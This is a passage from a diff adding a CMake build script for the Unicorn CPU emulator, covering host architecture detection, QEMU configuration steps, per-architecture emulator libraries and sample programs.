(UNICORN_STATIC_MSVCRT) + string(REPLACE "/MD" "/MT" CMAKE_C_FLAGS_DEBUG ${CMAKE_C_FLAGS_DEBUG}) + string(REPLACE "/MD" "/MT" CMAKE_C_FLAGS_RELEASE ${CMAKE_C_FLAGS_RELEASE}) + endif() +else() + # detect host arch. 
+ execute_process(COMMAND ${CMAKE_C_COMPILER} -dM -E - + INPUT_FILE /dev/null + OUTPUT_VARIABLE UC_COMPILER_MACRO) + + while(TRUE) + string(FIND ${UC_COMPILER_MACRO} "__x86_64__" UC_RET) + if (${UC_RET} GREATER "0") + set(UNICORN_TARGET_ARCH "i386") + break() + endif() + string(FIND ${UC_COMPILER_MACRO} "__i386__" UC_RET) + if (${UC_RET} GREATER "0") + set(UNICORN_TARGET_ARCH "i386") + break() + endif() + string(FIND ${UC_COMPILER_MACRO} "__arm__" UC_RET) + if (${UC_RET} GREATER "0") + set(UNICORN_TARGET_ARCH "arm") + break() + endif() + string(FIND ${UC_COMPILER_MACRO} "__aarch64__" UC_RET) + if (${UC_RET} GREATER "0") + set(UNICORN_TARGET_ARCH "aarch64") + break() + endif() + string(FIND ${UC_COMPILER_MACRO} "__mips__" UC_RET) + if (${UC_RET} GREATER "0") + set(UNICORN_TARGET_ARCH "mips") + break() + endif() + string(FIND ${UC_COMPILER_MACRO} "__sparc__" UC_RET) + if (${UC_RET} GREATER "0") + set(UNICORN_TARGET_ARCH "sparc") + break() + endif() + string(FIND ${UC_COMPILER_MACRO} "__ia64__" UC_RET) + if (${UC_RET} GREATER "0") + set(UNICORN_TARGET_ARCH "ia64") + break() + endif() + string(FIND ${UC_COMPILER_MACRO} "_ARCH_PPC" UC_RET) + if (${UC_RET} GREATER "0") + set(UNICORN_TARGET_ARCH "ppc") + break() + endif() + string(FIND ${UC_COMPILER_MACRO} "__s390__" UC_RET) + if (${UC_RET} GREATER "0") + set(UNICORN_TARGET_ARCH "s390") + break() + endif() + message(FATAL_ERROR "Unknown host compiler: ${CMAKE_C_COMPILER}.") + endwhile(TRUE) + + set(EXTRA_CFLAGS "--extra-cflags=") + if (UNICORN_HAS_X86) + set (EXTRA_CFLAGS "${EXTRA_CFLAGS}-DUNICORN_HAS_X86 ") + endif() + if (UNICORN_HAS_ARM) + set (EXTRA_CFLAGS "${EXTRA_CFLAGS}-DUNICORN_HAS_ARM -DUNICORN_HAS_ARMEB ") + endif() + if (UNICORN_HAS_AARCH64) + set (EXTRA_CFLAGS "${EXTRA_CFLAGS}-DUNICORN_HAS_ARM64 -DUNICORN_HAS_ARM64EB ") + endif() + if (UNICORN_HAS_M68K) + set (EXTRA_CFLAGS "${EXTRA_CFLAGS}-DUNICORN_HAS_M68K ") + endif() + if (UNICORN_HAS_MIPS) + set (EXTRA_CFLAGS "${EXTRA_CFLAGS}-DUNICORN_HAS_MIPS 
-DUNICORN_HAS_MIPSEL -DUNICORN_HAS_MIPS64 -DUNICORN_HAS_MIPS64EL ") + endif() + if (UNICORN_HAS_SPARC) + set (EXTRA_CFLAGS "${EXTRA_CFLAGS}-DUNICORN_HAS_SPARC ") + endif() + set (EXTRA_CFLAGS "${EXTRA_CFLAGS}-fPIC -fvisibility=hidden") + + set(TARGET_LIST "--target-list=") + if (UNICORN_HAS_X86) + set (TARGET_LIST "${TARGET_LIST}x86_64-softmmu, ") + endif() + if (UNICORN_HAS_ARM) + set (TARGET_LIST "${TARGET_LIST}arm-softmmu, armeb-softmmu, ") + endif() + if (UNICORN_HAS_AARCH64) + set (TARGET_LIST "${TARGET_LIST}aarch64-softmmu, aarch64eb-softmmu, ") + endif() + if (UNICORN_HAS_M68K) + set (TARGET_LIST "${TARGET_LIST}m68k-softmmu, ") + endif() + if (UNICORN_HAS_MIPS) + set (TARGET_LIST "${TARGET_LIST}mips-softmmu, mipsel-softmmu, mips64-softmmu, mips64el-softmmu, ") + endif() + if (UNICORN_HAS_SPARC) + set (TARGET_LIST "${TARGET_LIST}sparc-softmmu, sparc64-softmmu, ") + endif() + set (TARGET_LIST "${TARGET_LIST} ") + + # GEN config-host.mak & target directories + execute_process(COMMAND sh ${CMAKE_CURRENT_SOURCE_DIR}/qemu/configure + ${EXTRA_CFLAGS} + ${TARGET_LIST} + WORKING_DIRECTORY ${CMAKE_BINARY_DIR} + ) + execute_process(COMMAND sh ${CMAKE_CURRENT_SOURCE_DIR}/qemu/scripts/create_config + INPUT_FILE ${CMAKE_BINARY_DIR}/config-host.mak + OUTPUT_FILE ${CMAKE_BINARY_DIR}/config-host.h + ) + if (UNICORN_HAS_X86) + execute_process(COMMAND sh ${CMAKE_CURRENT_SOURCE_DIR}/qemu/scripts/create_config + INPUT_FILE ${CMAKE_BINARY_DIR}/x86_64-softmmu/config-target.mak + OUTPUT_FILE ${CMAKE_BINARY_DIR}/x86_64-softmmu/config-target.h + ) + endif() + if (UNICORN_HAS_ARM) + execute_process(COMMAND sh ${CMAKE_CURRENT_SOURCE_DIR}/qemu/scripts/create_config + INPUT_FILE ${CMAKE_BINARY_DIR}/arm-softmmu/config-target.mak + OUTPUT_FILE ${CMAKE_BINARY_DIR}/arm-softmmu/config-target.h + ) + execute_process(COMMAND sh ${CMAKE_CURRENT_SOURCE_DIR}/qemu/scripts/create_config + INPUT_FILE ${CMAKE_BINARY_DIR}/armeb-softmmu/config-target.mak + OUTPUT_FILE 
${CMAKE_BINARY_DIR}/armeb-softmmu/config-target.h + ) + endif() + if (UNICORN_HAS_AARCH64) + execute_process(COMMAND sh ${CMAKE_CURRENT_SOURCE_DIR}/qemu/scripts/create_config + INPUT_FILE ${CMAKE_BINARY_DIR}/aarch64-softmmu/config-target.mak + OUTPUT_FILE ${CMAKE_BINARY_DIR}/aarch64-softmmu/config-target.h + ) + execute_process(COMMAND sh ${CMAKE_CURRENT_SOURCE_DIR}/qemu/scripts/create_config + INPUT_FILE ${CMAKE_BINARY_DIR}/aarch64eb-softmmu/config-target.mak + OUTPUT_FILE ${CMAKE_BINARY_DIR}/aarch64eb-softmmu/config-target.h + ) + endif() + if (UNICORN_HAS_M68K) + execute_process(COMMAND sh ${CMAKE_CURRENT_SOURCE_DIR}/qemu/scripts/create_config + INPUT_FILE ${CMAKE_BINARY_DIR}/m68k-softmmu/config-target.mak + OUTPUT_FILE ${CMAKE_BINARY_DIR}/m68k-softmmu/config-target.h + ) + endif() + if (UNICORN_HAS_MIPS) + execute_process(COMMAND sh ${CMAKE_CURRENT_SOURCE_DIR}/qemu/scripts/create_config + INPUT_FILE ${CMAKE_BINARY_DIR}/mips-softmmu/config-target.mak + OUTPUT_FILE ${CMAKE_BINARY_DIR}/mips-softmmu/config-target.h + ) + execute_process(COMMAND sh ${CMAKE_CURRENT_SOURCE_DIR}/qemu/scripts/create_config + INPUT_FILE ${CMAKE_BINARY_DIR}/mipsel-softmmu/config-target.mak + OUTPUT_FILE ${CMAKE_BINARY_DIR}/mipsel-softmmu/config-target.h + ) + execute_process(COMMAND sh ${CMAKE_CURRENT_SOURCE_DIR}/qemu/scripts/create_config + INPUT_FILE ${CMAKE_BINARY_DIR}/mips64-softmmu/config-target.mak + OUTPUT_FILE ${CMAKE_BINARY_DIR}/mips64-softmmu/config-target.h + ) + execute_process(COMMAND sh ${CMAKE_CURRENT_SOURCE_DIR}/qemu/scripts/create_config + INPUT_FILE ${CMAKE_BINARY_DIR}/mips64el-softmmu/config-target.mak + OUTPUT_FILE ${CMAKE_BINARY_DIR}/mips64el-softmmu/config-target.h + ) + endif() + if (UNICORN_HAS_SPARC) + execute_process(COMMAND sh ${CMAKE_CURRENT_SOURCE_DIR}/qemu/scripts/create_config + INPUT_FILE ${CMAKE_BINARY_DIR}/sparc-softmmu/config-target.mak + OUTPUT_FILE ${CMAKE_BINARY_DIR}/sparc-softmmu/config-target.h + ) + execute_process(COMMAND sh 
${CMAKE_CURRENT_SOURCE_DIR}/qemu/scripts/create_config + INPUT_FILE ${CMAKE_BINARY_DIR}/sparc64-softmmu/config-target.mak + OUTPUT_FILE ${CMAKE_BINARY_DIR}/sparc64-softmmu/config-target.h + ) + endif() + add_compile_options( + -I${CMAKE_CURRENT_SOURCE_DIR}/qemu/tcg/${UNICORN_TARGET_ARCH} + -D_GNU_SOURCE + -D_FILE_OFFSET_BITS=64 + -D_LARGEFILE_SOURCE + -Wall -O2 + -fPIC -fpic -fvisibility=hidden + ) +endif() + +if (UNICORN_HAS_X86) +add_library(x86_64-softmmu + qemu/cpu-exec.c + qemu/cpus.c + qemu/cputlb.c + qemu/exec.c + qemu/fpu/softfloat.c + qemu/hw/i386/pc.c + qemu/hw/i386/pc_piix.c + qemu/hw/intc/apic.c + qemu/hw/intc/apic_common.c + qemu/ioport.c + qemu/memory.c + qemu/memory_mapping.c + qemu/target-i386/arch_memory_mapping.c + qemu/target-i386/cc_helper.c + qemu/target-i386/cpu.c + qemu/target-i386/excp_helper.c + qemu/target-i386/fpu_helper.c + qemu/target-i386/helper.c + qemu/target-i386/int_helper.c + qemu/target-i386/mem_helper.c + qemu/target-i386/misc_helper.c + qemu/target-i386/seg_helper.c + qemu/target-i386/smm_helper.c + qemu/target-i386/svm_helper.c + qemu/target-i386/translate.c + qemu/target-i386/unicorn.c + qemu/tcg/optimize.c + qemu/tcg/tcg.c + qemu/translate-all.c +) +if (NOT UNICORN_BUILD_SHARED) + target_link_libraries(x86_64-softmmu unicorn) +endif() + +if(MSVC) + target_compile_options(x86_64-softmmu PRIVATE + -DNEED_CPU_H + /FIx86_64.h + /I${CMAKE_CURRENT_SOURCE_DIR}/msvc/unicorn/x86_64-softmmu + /I${CMAKE_CURRENT_SOURCE_DIR}/qemu/target-i386 + ) +else() + target_compile_options(x86_64-softmmu PRIVATE + -DNEED_CPU_H + -include x86_64.h + -I${CMAKE_BINARY_DIR}/x86_64-softmmu + -I${CMAKE_CURRENT_SOURCE_DIR}/qemu/target-i386 + ) +endif() +endif() + +if (UNICORN_HAS_ARM) +add_library(arm-softmmu + qemu/cpu-exec.c + qemu/cpus.c + qemu/cputlb.c + qemu/exec.c + qemu/fpu/softfloat.c + qemu/hw/arm/tosa.c + qemu/hw/arm/virt.c + qemu/ioport.c + qemu/memory.c + qemu/memory_mapping.c + qemu/target-arm/cpu.c + qemu/target-arm/crypto_helper.c + 
qemu/target-arm/helper.c + qemu/target-arm/iwmmxt_helper.c + qemu/target-arm/neon_helper.c + qemu/target-arm/op_helper.c + qemu/target-arm/psci.c + qemu/target-arm/translate.c + qemu/target-arm/unicorn_arm.c + qemu/tcg/optimize.c + qemu/tcg/tcg.c + qemu/translate-all.c +) +if (NOT UNICORN_BUILD_SHARED) + target_link_libraries(arm-softmmu unicorn) +endif() + +if(MSVC) + target_compile_options(arm-softmmu PRIVATE + -DNEED_CPU_H + /FIarm.h + /I${CMAKE_CURRENT_SOURCE_DIR}/msvc/unicorn/arm-softmmu + /I${CMAKE_CURRENT_SOURCE_DIR}/qemu/target-arm + ) +else() + target_compile_options(arm-softmmu PRIVATE + -DNEED_CPU_H + -include arm.h + -I${CMAKE_BINARY_DIR}/arm-softmmu + -I${CMAKE_CURRENT_SOURCE_DIR}/qemu/target-arm + ) +endif() + +add_library(armeb-softmmu + qemu/cpu-exec.c + qemu/cpus.c + qemu/cputlb.c + qemu/exec.c + qemu/fpu/softfloat.c + qemu/hw/arm/tosa.c + qemu/hw/arm/virt.c + qemu/ioport.c + qemu/memory.c + qemu/memory_mapping.c + qemu/target-arm/cpu.c + qemu/target-arm/crypto_helper.c + qemu/target-arm/helper.c + qemu/target-arm/iwmmxt_helper.c + qemu/target-arm/neon_helper.c + qemu/target-arm/op_helper.c + qemu/target-arm/psci.c + qemu/target-arm/translate.c + qemu/target-arm/unicorn_arm.c + qemu/tcg/optimize.c + qemu/tcg/tcg.c + qemu/translate-all.c +) +if (NOT UNICORN_BUILD_SHARED) + target_link_libraries(armeb-softmmu unicorn) +endif() + +if(MSVC) + target_compile_options(armeb-softmmu PRIVATE + -DNEED_CPU_H + /FIarmeb.h + /I${CMAKE_CURRENT_SOURCE_DIR}/msvc/unicorn/armeb-softmmu + /I${CMAKE_CURRENT_SOURCE_DIR}/qemu/target-arm + ) +else() + target_compile_options(armeb-softmmu PRIVATE + -DNEED_CPU_H + -include armeb.h + -I${CMAKE_BINARY_DIR}/armeb-softmmu + -I${CMAKE_CURRENT_SOURCE_DIR}/qemu/target-arm + ) +endif() +endif() + +if (UNICORN_HAS_AARCH64) +add_library(aarch64-softmmu + qemu/cpu-exec.c + qemu/cpus.c + qemu/cputlb.c + qemu/exec.c + qemu/fpu/softfloat.c + qemu/hw/arm/tosa.c + qemu/hw/arm/virt.c + qemu/ioport.c + qemu/memory.c + qemu/memory_mapping.c 
+ qemu/target-arm/cpu.c + qemu/target-arm/cpu64.c + qemu/target-arm/crypto_helper.c + qemu/target-arm/helper-a64.c + qemu/target-arm/helper.c + qemu/target-arm/iwmmxt_helper.c + qemu/target-arm/neon_helper.c + qemu/target-arm/op_helper.c + qemu/target-arm/psci.c + qemu/target-arm/translate-a64.c + qemu/target-arm/translate.c + qemu/target-arm/unicorn_aarch64.c + qemu/tcg/optimize.c + qemu/tcg/tcg.c + qemu/translate-all.c +) +if (NOT UNICORN_BUILD_SHARED) + target_link_libraries(aarch64-softmmu unicorn) +endif() + +if(MSVC) + target_compile_options(aarch64-softmmu PRIVATE + -DNEED_CPU_H + /FIaarch64.h + /I${CMAKE_CURRENT_SOURCE_DIR}/msvc/unicorn/aarch64-softmmu + /I${CMAKE_CURRENT_SOURCE_DIR}/qemu/target-arm + ) +else() + target_compile_options(aarch64-softmmu PRIVATE + -DNEED_CPU_H + -include aarch64.h + -I${CMAKE_BINARY_DIR}/aarch64-softmmu + -I${CMAKE_CURRENT_SOURCE_DIR}/qemu/target-arm + ) +endif() + +add_library(aarch64eb-softmmu + qemu/cpu-exec.c + qemu/cpus.c + qemu/cputlb.c + qemu/exec.c + qemu/fpu/softfloat.c + qemu/hw/arm/tosa.c + qemu/hw/arm/virt.c + qemu/ioport.c + qemu/memory.c + qemu/memory_mapping.c + qemu/target-arm/cpu.c + qemu/target-arm/cpu64.c + qemu/target-arm/crypto_helper.c + qemu/target-arm/helper-a64.c + qemu/target-arm/helper.c + qemu/target-arm/iwmmxt_helper.c + qemu/target-arm/neon_helper.c + qemu/target-arm/op_helper.c + qemu/target-arm/psci.c + qemu/target-arm/translate-a64.c + qemu/target-arm/translate.c + qemu/target-arm/unicorn_aarch64.c + qemu/tcg/optimize.c + qemu/tcg/tcg.c + qemu/translate-all.c +) +if (NOT UNICORN_BUILD_SHARED) + target_link_libraries(aarch64eb-softmmu unicorn) +endif() + +if(MSVC) + target_compile_options(aarch64eb-softmmu PRIVATE + -DNEED_CPU_H + /FIaarch64eb.h + /I${CMAKE_CURRENT_SOURCE_DIR}/msvc/unicorn/aarch64eb-softmmu + /I${CMAKE_CURRENT_SOURCE_DIR}/qemu/target-arm + ) +else() + target_compile_options(aarch64eb-softmmu PRIVATE + -DNEED_CPU_H + -include aarch64eb.h + -I${CMAKE_BINARY_DIR}/aarch64eb-softmmu 
+ -I${CMAKE_CURRENT_SOURCE_DIR}/qemu/target-arm + ) +endif() +endif() + +if (UNICORN_HAS_M68K) +add_library(m68k-softmmu + qemu/cpu-exec.c + qemu/cpus.c + qemu/cputlb.c + qemu/exec.c + qemu/fpu/softfloat.c + qemu/hw/m68k/dummy_m68k.c + qemu/ioport.c + qemu/memory.c + qemu/memory_mapping.c + qemu/target-m68k/cpu.c + qemu/target-m68k/helper.c + qemu/target-m68k/op_helper.c + qemu/target-m68k/translate.c + qemu/target-m68k/unicorn.c + qemu/tcg/optimize.c + qemu/tcg/tcg.c + qemu/translate-all.c +) +if (NOT UNICORN_BUILD_SHARED) + target_link_libraries(m68k-softmmu unicorn) +endif() + +if(MSVC) + target_compile_options(m68k-softmmu PRIVATE + -DNEED_CPU_H + /FIm68k.h + /I${CMAKE_CURRENT_SOURCE_DIR}/msvc/unicorn/m68k-softmmu + /I${CMAKE_CURRENT_SOURCE_DIR}/qemu/target-m68k + ) +else() + target_compile_options(m68k-softmmu PRIVATE + -DNEED_CPU_H + -include m68k.h + -I${CMAKE_BINARY_DIR}/m68k-softmmu + -I${CMAKE_CURRENT_SOURCE_DIR}/qemu/target-m68k + ) +endif() +endif() + +if (UNICORN_HAS_MIPS) +add_library(mips-softmmu + qemu/cpu-exec.c + qemu/cpus.c + qemu/cputlb.c + qemu/exec.c + qemu/fpu/softfloat.c + qemu/hw/mips/addr.c + qemu/hw/mips/cputimer.c + qemu/hw/mips/mips_r4k.c + qemu/ioport.c + qemu/memory.c + qemu/memory_mapping.c + qemu/target-mips/cpu.c + qemu/target-mips/dsp_helper.c + qemu/target-mips/helper.c + qemu/target-mips/lmi_helper.c + qemu/target-mips/msa_helper.c + qemu/target-mips/op_helper.c + qemu/target-mips/translate.c + qemu/target-mips/unicorn.c + qemu/tcg/optimize.c + qemu/tcg/tcg.c + qemu/translate-all.c +) +if (NOT UNICORN_BUILD_SHARED) + target_link_libraries(mips-softmmu unicorn) +endif() + +if(MSVC) + target_compile_options(mips-softmmu PRIVATE + -DNEED_CPU_H + /FImips.h + /I${CMAKE_CURRENT_SOURCE_DIR}/msvc/unicorn/mips-softmmu + /I${CMAKE_CURRENT_SOURCE_DIR}/qemu/target-mips + ) +else() + target_compile_options(mips-softmmu PRIVATE + -DNEED_CPU_H + -include mips.h + -I${CMAKE_BINARY_DIR}/mips-softmmu + 
-I${CMAKE_CURRENT_SOURCE_DIR}/qemu/target-mips + ) +endif() + +add_library(mipsel-softmmu + qemu/cpu-exec.c + qemu/cpus.c + qemu/cputlb.c + qemu/exec.c + qemu/fpu/softfloat.c + qemu/hw/mips/addr.c + qemu/hw/mips/cputimer.c + qemu/hw/mips/mips_r4k.c + qemu/ioport.c + qemu/memory.c + qemu/memory_mapping.c + qemu/target-mips/cpu.c + qemu/target-mips/dsp_helper.c + qemu/target-mips/helper.c + qemu/target-mips/lmi_helper.c + qemu/target-mips/msa_helper.c + qemu/target-mips/op_helper.c + qemu/target-mips/translate.c + qemu/target-mips/unicorn.c + qemu/tcg/optimize.c + qemu/tcg/tcg.c + qemu/translate-all.c +) +if (NOT UNICORN_BUILD_SHARED) + target_link_libraries(mipsel-softmmu unicorn) +endif() + +if(MSVC) + target_compile_options(mipsel-softmmu PRIVATE + -DNEED_CPU_H + /FImipsel.h + /I${CMAKE_CURRENT_SOURCE_DIR}/msvc/unicorn/mipsel-softmmu + /I${CMAKE_CURRENT_SOURCE_DIR}/qemu/target-mips + ) +else() + target_compile_options(mipsel-softmmu PRIVATE + -DNEED_CPU_H + -include mipsel.h + -I${CMAKE_BINARY_DIR}/mipsel-softmmu + -I${CMAKE_CURRENT_SOURCE_DIR}/qemu/target-mips + ) +endif() + +add_library(mips64-softmmu + qemu/cpu-exec.c + qemu/cpus.c + qemu/cputlb.c + qemu/exec.c + qemu/fpu/softfloat.c + qemu/hw/mips/addr.c + qemu/hw/mips/cputimer.c + qemu/hw/mips/mips_r4k.c + qemu/ioport.c + qemu/memory.c + qemu/memory_mapping.c + qemu/target-mips/cpu.c + qemu/target-mips/dsp_helper.c + qemu/target-mips/helper.c + qemu/target-mips/lmi_helper.c + qemu/target-mips/msa_helper.c + qemu/target-mips/op_helper.c + qemu/target-mips/translate.c + qemu/target-mips/unicorn.c + qemu/tcg/optimize.c + qemu/tcg/tcg.c + qemu/translate-all.c +) +if (NOT UNICORN_BUILD_SHARED) + target_link_libraries(mips64-softmmu unicorn) +endif() + +if(MSVC) + target_compile_options(mips64-softmmu PRIVATE + -DNEED_CPU_H + /FImips64.h + /I${CMAKE_CURRENT_SOURCE_DIR}/msvc/unicorn/mips64-softmmu + /I${CMAKE_CURRENT_SOURCE_DIR}/qemu/target-mips + ) +else() + target_compile_options(mips64-softmmu PRIVATE + 
-DNEED_CPU_H + -include mips64.h + -I${CMAKE_BINARY_DIR}/mips64-softmmu + -I${CMAKE_CURRENT_SOURCE_DIR}/qemu/target-mips + ) +endif() + +add_library(mips64el-softmmu + qemu/cpu-exec.c + qemu/cpus.c + qemu/cputlb.c + qemu/exec.c + qemu/fpu/softfloat.c + qemu/hw/mips/addr.c + qemu/hw/mips/cputimer.c + qemu/hw/mips/mips_r4k.c + qemu/ioport.c + qemu/memory.c + qemu/memory_mapping.c + qemu/target-mips/cpu.c + qemu/target-mips/dsp_helper.c + qemu/target-mips/helper.c + qemu/target-mips/lmi_helper.c + qemu/target-mips/msa_helper.c + qemu/target-mips/op_helper.c + qemu/target-mips/translate.c + qemu/target-mips/unicorn.c + qemu/tcg/optimize.c + qemu/tcg/tcg.c + qemu/translate-all.c +) +if (NOT UNICORN_BUILD_SHARED) + target_link_libraries(mips64el-softmmu unicorn) +endif() + +if(MSVC) + target_compile_options(mips64el-softmmu PRIVATE + -DNEED_CPU_H + /FImips64el.h + /I${CMAKE_CURRENT_SOURCE_DIR}/msvc/unicorn/mips64el-softmmu + /I${CMAKE_CURRENT_SOURCE_DIR}/qemu/target-mips + ) +else() + target_compile_options(mips64el-softmmu PRIVATE + -DNEED_CPU_H + -include mips64el.h + -I${CMAKE_BINARY_DIR}/mips64el-softmmu + -I${CMAKE_CURRENT_SOURCE_DIR}/qemu/target-mips + ) +endif() +endif() + +if (UNICORN_HAS_SPARC) +add_library(sparc-softmmu + qemu/cpu-exec.c + qemu/cpus.c + qemu/cputlb.c + qemu/exec.c + qemu/fpu/softfloat.c + qemu/hw/sparc/leon3.c + qemu/ioport.c + qemu/memory.c + qemu/memory_mapping.c + qemu/target-sparc/cc_helper.c + qemu/target-sparc/cpu.c + qemu/target-sparc/fop_helper.c + qemu/target-sparc/helper.c + qemu/target-sparc/int32_helper.c + qemu/target-sparc/ldst_helper.c + qemu/target-sparc/mmu_helper.c + qemu/target-sparc/translate.c + qemu/target-sparc/unicorn.c + qemu/target-sparc/win_helper.c + qemu/tcg/optimize.c + qemu/tcg/tcg.c + qemu/translate-all.c +) +if (NOT UNICORN_BUILD_SHARED) + target_link_libraries(sparc-softmmu unicorn) +endif() + +if(MSVC) + target_compile_options(sparc-softmmu PRIVATE + -DNEED_CPU_H + /FIsparc.h + 
/I${CMAKE_CURRENT_SOURCE_DIR}/msvc/unicorn/sparc-softmmu + /I${CMAKE_CURRENT_SOURCE_DIR}/qemu/target-sparc + ) +else() + target_compile_options(sparc-softmmu PRIVATE + -DNEED_CPU_H + -include sparc.h + -I${CMAKE_BINARY_DIR}/sparc-softmmu + -I${CMAKE_CURRENT_SOURCE_DIR}/qemu/target-sparc + ) +endif() + +add_library(sparc64-softmmu + qemu/cpu-exec.c + qemu/cpus.c + qemu/cputlb.c + qemu/exec.c + qemu/fpu/softfloat.c + qemu/hw/sparc64/sun4u.c + qemu/ioport.c + qemu/memory.c + qemu/memory_mapping.c + qemu/target-sparc/cc_helper.c + qemu/target-sparc/cpu.c + qemu/target-sparc/fop_helper.c + qemu/target-sparc/helper.c + qemu/target-sparc/int64_helper.c + qemu/target-sparc/ldst_helper.c + qemu/target-sparc/mmu_helper.c + qemu/target-sparc/translate.c + qemu/target-sparc/unicorn64.c + qemu/target-sparc/vis_helper.c + qemu/target-sparc/win_helper.c + qemu/tcg/optimize.c + qemu/tcg/tcg.c + qemu/translate-all.c +) +if (NOT UNICORN_BUILD_SHARED) + target_link_libraries(sparc64-softmmu unicorn) +endif() + +if(MSVC) + target_compile_options(sparc64-softmmu PRIVATE + -DNEED_CPU_H + /FIsparc64.h + /I${CMAKE_CURRENT_SOURCE_DIR}/msvc/unicorn/sparc64-softmmu + /I${CMAKE_CURRENT_SOURCE_DIR}/qemu/target-sparc + ) +else() + target_compile_options(sparc64-softmmu PRIVATE + -DNEED_CPU_H + -include sparc64.h + -I${CMAKE_BINARY_DIR}/sparc64-softmmu + -I${CMAKE_CURRENT_SOURCE_DIR}/qemu/target-sparc + ) +endif() +endif() + +set(UNICORN_SRCS_COMMON + list.c + qemu/accel.c + qemu/glib_compat.c + qemu/hw/core/machine.c + qemu/hw/core/qdev.c + qemu/qapi/qapi-dealloc-visitor.c + qemu/qapi/qapi-visit-core.c + qemu/qapi/qmp-input-visitor.c + qemu/qapi/qmp-output-visitor.c + qemu/qapi/string-input-visitor.c + qemu/qemu-log.c + qemu/qemu-timer.c + qemu/qobject/qbool.c + qemu/qobject/qdict.c + qemu/qobject/qerror.c + qemu/qobject/qfloat.c + qemu/qobject/qint.c + qemu/qobject/qlist.c + qemu/qobject/qstring.c + qemu/qom/container.c + qemu/qom/cpu.c + qemu/qom/object.c + qemu/qom/qom-qobject.c + 
qemu/tcg-runtime.c + qemu/util/aes.c + qemu/util/bitmap.c + qemu/util/bitops.c + qemu/util/crc32c.c + qemu/util/cutils.c + qemu/util/error.c + qemu/util/getauxval.c + qemu/util/host-utils.c + qemu/util/module.c + qemu/util/qemu-timer-common.c + qemu/vl.c + uc.c +) + +if (MSVC) + set(UNICORN_SRCS + ${UNICORN_SRCS_COMMON} + qemu/util/oslib-win32.c + qemu/util/qemu-thread-win32.c + qemu/util/qemu-error.c + ${CMAKE_CURRENT_SOURCE_DIR}/msvc/unicorn/qapi-types.c + ${CMAKE_CURRENT_SOURCE_DIR}/msvc/unicorn/qapi-visit.c + ) + if(CMAKE_SIZEOF_VOID_P EQUAL 8) + enable_language(ASM_MASM) + set(UNICORN_SRCS ${UNICORN_SRCS} qemu/util/setjmp-wrapper-win32.asm) + endif() +else() + set(UNICORN_SRCS + ${UNICORN_SRCS_COMMON} + qemu/util/oslib-posix.c + qemu/util/qemu-thread-posix.c + qemu/qapi-types.c + qemu/qapi-visit.c + ) +endif() + +if (UNICORN_BUILD_SHARED) + add_library(unicorn SHARED + ${UNICORN_SRCS} + ) +else() + add_library(unicorn STATIC + ${UNICORN_SRCS} + ) +endif() + +if (UNICORN_HAS_X86) + set(UNICORN_COMPILE_OPTIONS ${UNICORN_COMPILE_OPTIONS} -DUNICORN_HAS_X86) + set(UNICORN_LINK_LIBRARIES ${UNICORN_LINK_LIBRARIES} x86_64-softmmu) + set(UNICORN_SAMPLE_FILE ${UNICORN_SAMPLE_FILE} sample_x86 sample_x86_32_gdt_and_seg_regs sample_batch_reg mem_apis shellcode) +endif() +if (UNICORN_HAS_ARM) + set(UNICORN_COMPILE_OPTIONS ${UNICORN_COMPILE_OPTIONS} -DUNICORN_HAS_ARM -DUNICORN_HAS_ARMEB) + set(UNICORN_LINK_LIBRARIES ${UNICORN_LINK_LIBRARIES} arm-softmmu armeb-softmmu) + set(UNICORN_SAMPLE_FILE ${UNICORN_SAMPLE_FILE} sample_arm sample_armeb) +endif() +if (UNICORN_HAS_AARCH64) + set(UNICORN_COMPILE_OPTIONS ${UNICORN_COMPILE_OPTIONS} -DUNICORN_HAS_ARM64) + set(UNICORN_LINK_LIBRARIES ${UNICORN_LINK_LIBRARIES} aarch64-softmmu aarch64eb-softmmu) + set(UNICORN_SAMPLE_FILE ${UNICORN_SAMPLE_FILE} sample_arm64 sample_arm64eb) +endif() +if (UNICORN_HAS_M68K) + set(UNICORN_COMPILE_OPTIONS ${UNICORN_COMPILE_OPTIONS} -DUNICORN_HAS_M68K) + set(UNICORN_LINK_LIBRARIES 
${UNICORN_LINK_LIBRARIES} m68k-softmmu) + set(UNICORN_SAMPLE_FILE ${UNICORN_SAMPLE_FILE} sample_m68k) +endif() +if (UNICORN_HAS_MIPS) + set(UNICORN_COMPILE_OPTIONS ${UNICORN_COMPILE_OPTIONS} -DUNICORN_HAS_MIPS -DUNICORN_HAS_MIPSEL -DUNICORN_HAS_MIPS64 -DUNICORN_HAS_MIPS64EL) + set(UNICORN_LINK_LIBRARIES ${UNICORN_LINK_LIBRARIES} mips-softmmu mipsel-softmmu mips64-softmmu mips64el-softmmu) + set(UNICORN_SAMPLE_FILE ${UNICORN_SAMPLE_FILE} sample_mips) +endif() +if (UNICORN_HAS_SPARC) + set(UNICORN_COMPILE_OPTIONS ${UNICORN_COMPILE_OPTIONS} -DUNICORN_HAS_SPARC) + set(UNICORN_LINK_LIBRARIES ${UNICORN_LINK_LIBRARIES} sparc-softmmu sparc64-softmmu) + set(UNICORN_SAMPLE_FILE ${UNICORN_SAMPLE_FILE} sample_sparc) +endif() + +target_compile_options(unicorn PRIVATE + ${UNICORN_COMPILE_OPTIONS} +) + +if(MSVC) + if (UNICORN_BUILD_SHARED) + target_compile_options(unicorn PRIVATE + -DUNICORN_SHARED + ) + endif() + + target_link_libraries(unicorn + ${UNICORN_LINK_LIBRARIES} + ) +else() + target_link_libraries(unicorn + ${UNICORN_LINK_LIBRARIES} + m + ) + set_target_properties(unicorn PROPERTIES + VERSION ${UNICORN_VERSION_MAJOR} + SOVERSION ${UNICORN_VERSION_MAJOR} + ) +endif() + +if(MSVC) + set(SAMPLES_LIB + unicorn + ) +else() + set(SAMPLES_LIB + unicorn + pthread + ) +endif() + +foreach(SAMPLE_FILE ${UNICORN_SAMPLE_FILE}) + add_executable(${SAMPLE_FILE} + ${CMAKE_CURRENT_SOURCE_DIR}/samples/${SAMPLE_FILE}.c + ) + target_link_libraries(${SAMPLE_FILE} + ${SAMPLES_LIB} + ) +endforeach(SAMPLE_FILE) + +if(NOT MSVC) + include("GNUInstallDirs") + file(GLOB UNICORN_HEADERS ${CMAKE_CURRENT_SOURCE_DIR}/include/unicorn/*.h) + install(TARGETS unicorn + RUNTIME DESTINATION bin + ARCHIVE DESTINATION ${CMAKE_INSTALL_LIBDIR} + LIBRARY DESTINATION ${CMAKE_INSTALL_LIBDIR} + ) + install(FILES ${UNICORN_HEADERS} DESTINATION ${CMAKE_INSTALL_INCLUDEDIR}/unicorn) + file(WRITE ${CMAKE_BINARY_DIR}/unicorn.pc "Name: unicorn\n\ +Description: Unicorn emulator 